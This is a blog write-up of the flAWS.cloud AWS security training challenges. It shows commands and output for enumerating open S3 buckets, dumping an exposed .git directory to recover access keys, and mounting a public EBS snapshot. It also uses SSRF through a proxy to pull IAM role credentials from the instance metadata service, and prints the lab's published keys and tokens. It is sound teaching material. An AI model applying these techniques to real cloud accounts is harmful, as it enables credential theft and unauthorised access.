flAWS.cloud Experience and Write-Up

FLAWS is not a CTF per se. There are no teams, no scoreboard, no score, and the hints will walk you through each step for every challenge if you choose to view them. FLAWS is a freely available series of challenges designed to teach its users about common mistakes and misconfigurations when using AWS. The challenges can be found at: http://flaws.cloud/

Here's my writeup for the six levels:

Level 1

This level is *buckets* of fun.  See if you can find the first sub-domain.

I began this level by enumerating buckets with cloud_enum, targeting the keyword "flaws.cloud," and I pressed Ctrl+C after I saw the "secret" html file to limit the amount of requests to Amazon:

# cloud_enum -k flaws.cloud --disable-azure --disable-gcp
<snip>
[+] Checking for S3 buckets
    OPEN S3 BUCKET: http://flaws.cloud.s3.amazonaws.com/
      FILES:                                                                                                           
      ->http://flaws.cloud.s3.amazonaws.com/flaws.cloud
      ->http://flaws.cloud.s3.amazonaws.com/hint1.html
      ->http://flaws.cloud.s3.amazonaws.com/hint2.html
      ->http://flaws.cloud.s3.amazonaws.com/hint3.html
      ->http://flaws.cloud.s3.amazonaws.com/index.html
      ->http://flaws.cloud.s3.amazonaws.com/logo.png
      ->http://flaws.cloud.s3.amazonaws.com/robots.txt
      ->http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html
    [!] Connection error on flaws.cloud.analytics.s3.amazonaws.com. Investigate if there are many of these.
^CThanks for playing!...

I figured that the "secret" html file was the target and used curl to see what it was. I like to put && echo at the end of my curl commands because if the command runs successfully, echo will add a newline which prevents that annoying thing that bash does when your prompt is in line with the output from the previous command.

# curl http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html && echo

<snip>

<h1>Congrats! You found the secret file!</h1>
</center>

Level 2 is at <a href="http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud">http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud</a>

Level 2

The next level is fairly similar, with a slight twist.  You're going to need your own AWS account for this.  You just need the free tier.

Browsing to the URL for Level 2 loads the lesson, examples cases, and tips to avoid the issue in the challenge for Level 1. Which is awesome. Kudos to Scott Piper (@0xdabbad00) for putting together such an informative resource for free. 

Additionally, the main page for Level 2 presented the challenge (posted above) that needed solved in order to progress to Level 3. I had already configured aws cli and I know that the S3 service is a fantastic way to host static websites; so I assumed the URL was also the S3 bucket that we would have to review: 

# aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

2017-02-26 21:02:15 80751 everyone.png
2017-03-02 22:47:17 1433 hint1.html
2017-02-26 21:04:39 1035 hint2.html
2017-02-26 21:02:14 2786 index.html
2017-02-26 21:02:14 26 robots.txt
2017-02-26 21:02:15 1051 secret-e4443fc.html

# curl http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html && echo

<snip>

<h1>Congrats! You found the secret file!</h1>
</center>

Level 3 is at <a href="http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud">http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud</a>

Level 3

The next level is fairly similar, with a slight twist.  Time to find your first AWS key! I bet you'll find something that will let you list what other buckets are.

Starting off with the same assumptions about how FLAWS was using S3 buckets, I started by reviewing the content with aws s3:

# aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

                           PRE .git/
2017-02-26 19:14:33     123637 authenticated_users.png
2017-02-26 19:14:34       1552 hint1.html
2017-02-26 19:14:34       1426 hint2.html
2017-02-26 19:14:35       1247 hint3.html
2017-02-26 19:14:33       1035 hint4.html
2020-05-22 14:21:10       1861 index.html
2017-02-26 19:14:33         26 robots.txt

The .git directory is often a treasure trove of information. Having pillaged .git directories on web servers in other CTFs and external engagements that I've conducted professionally, I knew that gitdumper from GitTools (https://github.com/internetwache/GitTools) would download all of the objects and commit history. Then, I could use extractor.sh script that is also from GitTools to place all of the objects in a local directory that I could peruse:

# gitdumper.sh http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/ flaws/level3 

<snip>

# extractor.sh /root/flaws/level3/ flaws/level3/gitout 

<snip>

~/flaws/level3/gitout# tree

.

├── 0-f52ec03b227ea6094b04e43f475fb0126edb5a61

│   ├── access_keys.txt

<snip>

cat 0-f52ec03b227ea6094b04e43f475fb0126edb5a61/access_keys.txt 

access_key AKIAJ366LIPB4IJKT7SA

secret_access_key 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

# aws configure  

<snip> # Note: entered key material with no region set

# aws s3 ls

2017-02-12 16:31:07 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
2017-05-29 12:34:53 config-bucket-975426262029
2017-02-12 15:03:24 flaws-logs
2017-02-04 22:40:07 flaws.cloud
2017-02-23 20:54:13 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-26 13:15:44 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
2017-02-26 13:16:06 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
2017-02-26 14:44:51 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
2017-02-26 14:47:58 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
2017-02-26 15:06:32 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Level 4

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.

One important concept concerning AWS resources is that of Regions. An AWS region is a geographic location consisting of multiple Availability Zones (AZ). Both Regions and AZs are isolated, but AZz are interconnected. 

All that to say, if you attempt to use "aws ec2" commands against a resource in region us-west-2, but you specified us-east-1, you are going to have a bad time.

So the first stumbling block that I encountered was caused by me when I ran aws configure and set the region to us-east-1.  

With that in mind, I used ec2 describe-snapshots to begin hunting down the snapshot: 

# aws ec2 describe-snapshots --filters Name=description,Values=*flaws*

{
    "Snapshots": [
        {
            "Description": "flaws4 volume copied",
            "Encrypted": false,
            "OwnerId": "206747113237",
            "Progress": "100%",
            "SnapshotId": "snap-07a9c50931c651cf8",
            "StartTime": "2020-03-02T16:34:10.260Z",
            "State": "completed",
            "VolumeId": "vol-ffffffff",
            "VolumeSize": 8
        }
    ]
}

If you read my 2020 HTH CTF - Cloud Challenges post, then you may recall that I have incurred charges while messing around with snapshots. An important thing to know about AWS is that uploading data is, generally speaking; free. Getting it back out and moving it around will have cost associated it.

So what I wanted to do was validate that this snapshot, was in-fact, without a doubt, the "right" one. 
I know I have the "right credentials" but I entered us-east-1 with the thought that I'd just go through each region till I found a snapshot. I was suspicious when my first attempt found the snapshot so I knew that I needed to check my answer. 

To do that, I pinged the level 4 bucket:

# ping level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
PING level4-1156739cfb264ced6de514971a4bef68.flaws.cloud (52.218.144.79) 56(84) bytes of data.
64 bytes from s3-website-us-west-2.amazonaws.com (52.218.144.79): icmp_seq=1 ttl=28 time=95.0 ms

Ah Ha! I was in the wrong region. 

For consistency, I updated the region with aws configure and issued the command again:

# aws ec2 describe-snapshots --filters Name=description,Values=*flaws*
{
    "Snapshots": []
}

Now, with the correct region set for the "stolen" credentials I was using, there were no results. This made me think about what else I could search for. Another bit of information we can filter results on is the OwnerID. If I could run a "whoami" equivalent command in AWS, I could verify if 206747113237 was in fact the right snapshot for the credentials I was using.

A quick Google search for "aws whoami" returned the document for get-caller-identity for the security token service (sts) command. 

# aws sts get-caller-identity
{
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/backup"
}

It seemed safe to assume that the value for the "Account" parameter and in the Amazon Reference Number (ARN), should have matched the result the snapshot returned in us-east-1 which it clearly did not.

Having excluded the result from us-east-1, I then leveraged the ec2 command once again, but this time I filtered the results by owner-id:

# aws ec2 describe-snapshots --owner-id 975426262029
{
    "Snapshots": [
        {
            "Description": "",
            "Encrypted": false,
            "OwnerId": "975426262029",
            "Progress": "100%",
            "SnapshotId": "snap-0b49342abd1bdcb89",
            "StartTime": "2017-02-28T01:35:12.000Z",
            "State": "completed",
            "VolumeId": "vol-04f1c039bc13ea950",
            "VolumeSize": 8,
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "flaws backup 2017.02.27"
                }
            ]
        }
    ]
}

As seen in the output above, the empty description field is why I had no results for the description query in the correct region. 

The goal now is to copy the volume snapshot into the AWS account that I actually owned and mount it on an instance. So, I reset my credentials and issued the following command:

# aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

When you specify the AZ, you're actually specifying the destination AZ. This wasn't obvious to me, so I read up on the create-volume command and began experimenting. What I learned was that you can specify any AZ so long as it is in the same region as the snapshot you are copying.

After copying the snapshot, I logged into the management console, changed my region to us-west-2, and opened up the EC2 service and navigated to "Volumes" under the Elastic Block Storage menu.  

At this point I still needed to create an instance so I went back and created a free tier Ubuntu instance, applied a policy to only allow my public ip to ssh to it, created a new key pair and connected to it once the new instance was ready. 

Back in the dashboard I selected the snapshot and attached it to the newly spun up instance. AWS prompted me to enter information (but auto populated) the running instance, asked for a /dev/sXX name, and warned me that it may be renamed to something like xvdXX.

After attaching the volume, I issued the following commands:

ubuntu@ip-172-31-46-167:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop0     7:0    0 97.8M  1 loop /snap/core/10185
loop1     7:1    0 55.3M  1 loop /snap/core18/1885
loop2     7:2    0 70.6M  1 loop /snap/lxd/16922
loop3     7:3    0 28.1M  1 loop /snap/amazon-ssm-agent/2012
xvda    202:0    0    8G  0 disk 
└─xvda1 202:1    0    8G  0 part /

ubuntu@ip-172-31-46-167:~$ sudo file -s /dev/xvda1
/dev/xvda1: Linux rev 1.0 ext4 filesystem data, UUID=175c087c-0fe9-4d62-a38d-e5f8a66a5851, volume name "cloudimg-rootfs" (needs journal recovery) (extents) (64bit) (large files) (huge files)

ubuntu@ip-172-31-46-167:~$ sudo mount /dev/xvda1 /mnt

ubuntu@ip-172-31-46-167:/$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop0     7:0    0 97.8M  1 loop /snap/core/10185
loop1     7:1    0 55.3M  1 loop /snap/core18/1885
loop2     7:2    0 70.6M  1 loop /snap/lxd/16922
loop3     7:3    0 28.1M  1 loop /snap/amazon-ssm-agent/2012
xvda    202:0    0    8G  0 disk 
└─xvda1 202:1    0    8G  0 part /mnt
xvdf    202:80   0    8G  0 disk 
└─xvdf1 202:81   0    8G  0 part 

For some reason, at this point I stopped logging commands. I believe what happened was that I mounted the wrong device, unmounted it, and at some point decided that comparing the md5sums of the two passwd files was a good way to verify that I successfully addressed the issue:

ubuntu@ip-172-31-46-167:/$ sudo mount /dev/xvdf1 /mnt

ubuntu@ip-172-31-46-167:/$ cd /mnt

ubuntu@ip-172-31-46-167:/mnt$ md5sum etc/passwd
2eb872cf4018f117b3c4fa1dedb6844a  etc/passwd

ubuntu@ip-172-31-46-167:/mnt$ md5sum /etc/passwd
3252d5691e699e7193e8164c459adb79  /etc/passwd

ubuntu@ip-172-31-46-167:/mnt$ ls var/
backups/ cache/   crash/   lib/     local/   lock/    log/     mail/    opt/     run/     snap/    spool/   tmp/     www/     

ubuntu@ip-172-31-46-167:/mnt$ ls var/www/html/
index.html  robots.txt  

ubuntu@ip-172-31-46-167:/mnt$ cat var/www/html/index.html 

<snip>

Good work getting in.  This level is described at <a href="http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/">http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/</a>

Level 5

This EC2 has a simple HTTP only proxy on it. Here are some examples of it's usage:


http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/

See if you can use this proxy to figure out how to list the contents of the level6 bucket at level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.

I began this one by targeting local files by targeting localhost and 127.0.0.1 but I was pretty stumped about where to go so I took the first hint:

On cloud services, including AWS, the IP 169.254.169.254 is magical.  It's the metadata service.There is an RFC on it (RFC-3927), but you should read the AWS specific docs on it here.  

Need another hint?  Go to Hint 2 

Ah yes, now I recall seeing a few references to various 169 addresses while working on the HTH cloud challenges.  After some reading about the metadata service, I learned that you can obtain credentials from it. So, I leveraged the proxy feature for the level to browse to: 169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/

First, I copied and added the credentials to the .aws/credentials file and attempted to use s3 to list or copy the contents of the level6 bucket but I received an access denied error   

# aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud 

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied

I started exploring the meta-data service by issuing curl commands to browse around the directory structure and eventually I found a different set of credentials under the iam rather than ec2:

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws &&echo

{

  "Code" : "Success",

  "LastUpdated" : "2021-02-23T17:14:40Z",

  "Type" : "AWS-HMAC",

  "AccessKeyId" : "ASIA6GG7PSQG3OIG3VV2",

  "SecretAccessKey" : "/CEI0RR92CotdDkhIaUFwpVpzyCwLnDGe77jKEMH",

  "Token" : "IQoJb3JpZ2luX2VjEOn//////////wEaCXVzLXdlc3QtMiJIMEYCIQDaHfmt4atnHXcHII3eUgshtWXA6ZdNzhiauXPI6fUYtAIhAIgWPOmVDrwkXaFNMukfRihlkw7x4tOarsY2mIDlIg2jKr0DCPL//////////wEQARoMOTc1NDI2MjYyMDI5IgxVul6YNRR4NfpjGdAqkQMTSizbBfXjo8o3JZDZPTX/AOUHx9fojwM4/C1Wuij92QbVAbKUElcS1iwTXgvtseM+Oxj0XJnOvlYeoaHeinoqNuLX02LZ95AO8yz6x9K7hV+2aXw7Cf/OCOTI4+TN59vxwKegW7T9HZF9osDKaSRzAxzurIod97m4B6C54thi9+BX7TwYFDPiQV2Gjvx3XthA461pGIIaMHqlI81yy0S8ChbAYlZz2pVRHEBTe5Cv27BJs+d4QUYHjULjDymieigo1QdQtVYPpjtYd52OUbc0BJzmHf2s8glAUQcZMcWBiB8Z05cbHd2qqVLOxxbXH5Z+6j+hKoKZxL/Y41oSvMfQvDb9J6Tn8xHhwrBcViTUGKBlQMMateKkCNTM1w1GhiZ6mBoWY2uxX6LC7yjXanvng8kBX0b1k0oND8yFeschAMX4fX7nUaBaEv3EkUVt/aB+JpDpzXrjCtNPFnwZpQtcXWflb3FZ+0EXSs2BLTaunXN2FiCc5nj0Nuv//aljeCjRIp2kqWQTZNsYsfgLY+Zj8DCj8NSBBjrqART2P693V/8VnIuvXwlFtQEtpRwJ+pVJGqNOCHnCqwd4v6faCho7+Wmhv5s8GDQn/BUnsRHWap4EPFjFtUbDkrxuQ87NLE/mivSJjdYauS7jBrW4HnDKq41StbaoulLI45zV8QHLyJmxItVxkkkrgsz0TNz+ckf8/YCkeyMNcs11SBNA65zjnRKFkSgbdao22K55+1xYkxky/boBbaljvJi62H4/fUyJ1jh3T4qCPUtZCzmjiGF9ZezoMn/2w0DGgi42DUe8ur95bKo88nBq1oLG6mMaKpJKx+kEgF+sjVH20azutZIFK6VrkA==",

  "Expiration" : "2021-02-23T23:20:42Z"

}

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/ &&echo

{

  "Code" : "Success",

  "LastUpdated" : "2021-02-23T17:15:17Z",

  "Type" : "AWS-HMAC",

  "AccessKeyId" : "ASIA6GG7PSQG2KLKDVG4",

  "SecretAccessKey" : "YLgKg0/OO4UK+28W/inrgPFt7XA2iy4gk3UQpfRK",

  "Token" : "IQoJb3JpZ2luX2VjEOn//////////wEaCXVzLXdlc3QtMiJIMEYCIQCkZHKULDojTKvFGrM2rJZxRUz8yzeIqRrCM4HwaVmErQIhAKGX9PjshxWr8KKC1a3ozzf6pujt1Q6MqOX958HbZ2X7KsgDCPL//////////wEQARoMOTc1NDI2MjYyMDI5Igzcl4xZE1x6cW/ABgIqnANROsvWZZcEjecVwcXD8tnAIhH6r07P4QwkavacNvQQyQQ0ZcIDShjiBmKuabZYpHIwjCE1vFjpmRY5cAwpKgqzaAo9+rbX/rz2o3efaIg7AytZdmL7jr62MkCB6nRZN02jNpld/cqLj+PVk9rJ8gTSGlHsIc2ql16ZhI/E0+igbIMyVhP0e1YgnWfVCDycgHCRcXZg6yLdqFktoFIVcP8VMxbDyH0yfRZQQHStuKLAc2mL85m/rgxsyhVFrYudF8/mxvHcidy7nLaYhENu08QzWJGiKKFsw9Zs0EwWaDO/x42JwunPbh18SPhbJLGFBiPS4GT2SnzpaIWn7bpSWJWWl9KJH3OSipQacYTqaYuTA6UW1f3VDdng0tCTrJbheDoHMce1wGYU+AUW0HsheA51Ie9bATDAc95DlUxe7s2HQD4NPAoo8dg/d2XTqsAQ0foHYIHdqYo9hvpYf+ZWidQrUdC+CuAO2SYFpfwS7RIszdjVl4rXZ14aZItuFPX7EIMSW+Kiqsf1kKrSB35bAKYdX6LTTb37Bat3ANQhMKPw1IEGOuYB+QqBl1QKwI/1hzrdOYKis30pO3j6KUdA60FJ0AM863h8+wVndEbfw9jBDcBeKAAW6QywiDAGPjEMvMmX1fdxflMGndTOk9bHvu/WLtKeQKTguBdQ/STquE7qsXMRkFiFqZfGUO/DhT29u+kIRzqQF6n4P01aR+4g2mFJAcpYWd8spUF1z5OVoTGGvMBmP6kALgTLvkXvev3SRC3n4aUNPzdFEx1XaKpbMvePCZ7odWpO0+b28THVGo7DsXTrL0SQkHl9VIqgh+3ldJpem/xBkrk/7BkCIJa4EP0fOk5KjoH7tzuaRfw=",

  "Expiration" : "2021-02-23T23:20:17Z"

}

After updating the credentials, I was then able to use s3 to list and copy the contents of the bucket:

# aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud 

                           PRE ddcc78ff/

2017-02-26 21:11:07        871 index.html

# aws s3 cp s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/index.html .
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/index.html to ./index.html

# cat index.html 

<snip>
<h1>Access Denied</h1>
</center>

Level 6 is hosted in a sub-directory, but to figure out that directory, you need to play level 5 properly.

<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>

# aws s3 cp s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ . --recursive
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/hint1.html to ddcc78ff/hint1.html
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/hint2.html to ddcc78ff/hint2.html
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/index.html to ddcc78ff/index.html
Download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/index.html to ./index.html

# cat ddcc78ff/index.html 
<snip>
<h1>Level 6</h1>
For this final challenge, you're getting a user access key that has the SecurityAudit policy attached to it.  See what else it can do and what else you might find in this AWS account.

<p>Access key ID: AKIAJFQ6E7BY57Q3OBGA<br>
Secret: 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<br> 


<p>Need a hint?  Go to  <a href="./hint1.html">Hint 1</a>

Level 6

For this final challenge, you're getting a user access key that has the SecurityAudit policy attached to it.  See what else it can do and what else you might find in this AWS account.

<p>Access key ID: AKIAJFQ6E7BY57Q3OBGA<br>
Secret: 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<br> 

For this one, I decided to start this by using weirdAAL to help enumerate what this account can do. 

More information on installing it can be found in the 2020 HTH Cloud Challenges post.

# python3 ./weirdAAL.py -m recon_all -t flawsL6

<snip>

Printing Users
[    {    'Arn': 'arn:aws:iam::975426262029:user/backup',
          'CreateDate': datetime.datetime(2017, 2, 12, 20, 58, 26, tzinfo=tzutc()),
          'Path': '/',
          'UserId': 'AIDAJQ3H5DC3LEG2BKSLC',
          'UserName': 'backup'},
     {    'Arn': 'arn:aws:iam::975426262029:user/Level6',
          'CreateDate': datetime.datetime(2017, 2, 26, 23, 11, 16, tzinfo=tzutc()),
          'Path': '/',
          'UserId': 'AIDAIRMDOSCWGLCDWOG6A',
          'UserName': 'Level6'}]
<snip>

The amount of information that came back was a bit intimidating. I looked for information relating to policies but it was just not in there that I could see. I started poking at some database and lambda actions (one was named Level6 which seemed telling) but honestly I couldn't figure out where to go with that information and so I decided to stay focused on the SecurityAudit policy that was called out in the challenge. Aside from learning the username I didn't get very much out of this.

Next, I tried leveraging enumerate-iam.py to see if I could learn more about the policies:

# python3 enumerate-iam.py --access-key AKIAJFQ6E7BY57Q3OBGA --secret-key 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 --region us-west-2 &> l6.out

<snip>

I used less to review the output file and did a search for SecurityAudit and here's the section I found:

            "Path": "/",
            "UserName": "Level6",
            "UserId": "AIDAIRMDOSCWGLCDWOG6A",
            "Arn": "arn:aws:iam::975426262029:user/Level6",
            "CreateDate": "2017-02-26T23:11:16+00:00",
            "GroupList": [],
            "AttachedManagedPolicies": [
                {
                    "PolicyName": "list_apigateways",
                    "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
                },
                {
                    "PolicyName": "MySecurityAudit",
                    "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
                }

Okay, now we're getting somewhere. I went through the occurrences of where SecurityAudit was present in the file and I found a list of allowed actions. With respect to s3, all it could do is list buckets. 

I was fairly stuck here, so I reviewed hint 1 which instructed me to review what the policy allows by determining the version ID for the list_apigateways policy.

Instead of running the commands listed in the hint, I went back to the enumerate-iam output file and reviewed what the tool reported about the list_apigateways policy where I found the information that the hint instructed me to look for:

                    "Document": {
                        "Version": "2012-10-17",
                        "Statement": [
                            {
                                "Action": [
                                    "apigateway:GET"
                                ],
                                "Effect": "Allow",
                                "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
                            }
                        ]
                    }

Hint 1 leaves us here. 

I read up on the apigateway aws cli command and saw that in order to use get-rest-api I would need a a valid rest-api-id. 

Reviewing the enumerate-iam output again, I first assumed the id would be the "pusp" value I saw here:

"Resource": "arn:aws:apigateway:us-west-2::/restapis/puspzvwgb6/stages"

That was a bad assumption. Again, after reviewing a lot of documentation and tool output, I felt like I hit a wall that I just couldn't surmount. I am a bit sad to report and not too proud to admit that the Level 6 challenge got the best of me and taught me some valuable lessons about how all these services can interact with each other. And, of course, what it means for your security posture. 

The second hint confirmed I was on the right path about getting the rest-api-id and told us that with the SecurityAudit policy, it is possible to identify it with the following command:

# aws --region us-west-2 lambda get-policy --function-name Level6
{
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
    "RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b"

Do you see it? It's: s33ppypa75

Even though I had the right commands needed to solve this challenge from the hint. I wanted to continue my initial thought process and verified that I still had some more reading to do on apigateway commands. 

The end goal was to identify the stage name so you could infer the URL by browsing to the API gateway (https://s33ppypa75.execute-api.us-west-2.amazonaws.com/) and pairing that information with the stage name and the lambda function name (/Prod/level6). A keen eye will note the lowercase "L" as specified in the AWS:SourceARN.   

Browsing to that link gives you the final URI for the content hosted on "theend" S3 bucket.

The End

Lesson learned

It is common to give people and entities read-only permissions such as the SecurityAudit policy. The ability to read your own and other's IAM policies can really help an attacker figure out what exists in your environment and look for weaknesses and mistakes.
Avoiding this mistake

Don't hand out any permissions liberally, even permissions that only let you read meta-data or know what your permissions are.

To be continued ;)  

Conclusion

What a fantastic resource! It confirmed that I know most of what I thought I knew, it challenged me to go a little bit further in order to figure some of the other challenges out, and it humbled me by showing just how complicated and esoteric the cloud can be when you don't specialize on a single platform or you spent too much time trying to abuse Windows environments. 

There were a few things that I picked up about aws while running through these challenges that I'd like to share here in a quick bullet item list:

  • ping an S3 bucket to quickly check which region you are targeting. 
  • aws configure --profile NAME for credential management.
    • create profiles by using brackets in .aws/credentials
  • aws --profile NAME sts get-caller-identity to validate who you are working as. 
  • For loops for running commands in and against all regions. 
    • for R in $(aws ec2 describe-regions --output text --query 'Regions[].[RegionName]') ; do echo "$R:"; aws ec2 describe-instances --output json --region $R | jq -r '.[]';echo;done

Thanks for reading!

@strupo_

Find us on twitter: @teamWTG


Popular posts from this blog

The Audacity of Some CTFs

Code Name: Treehouse of Horror CTF

2020 HTH CTF - Cloud Challenges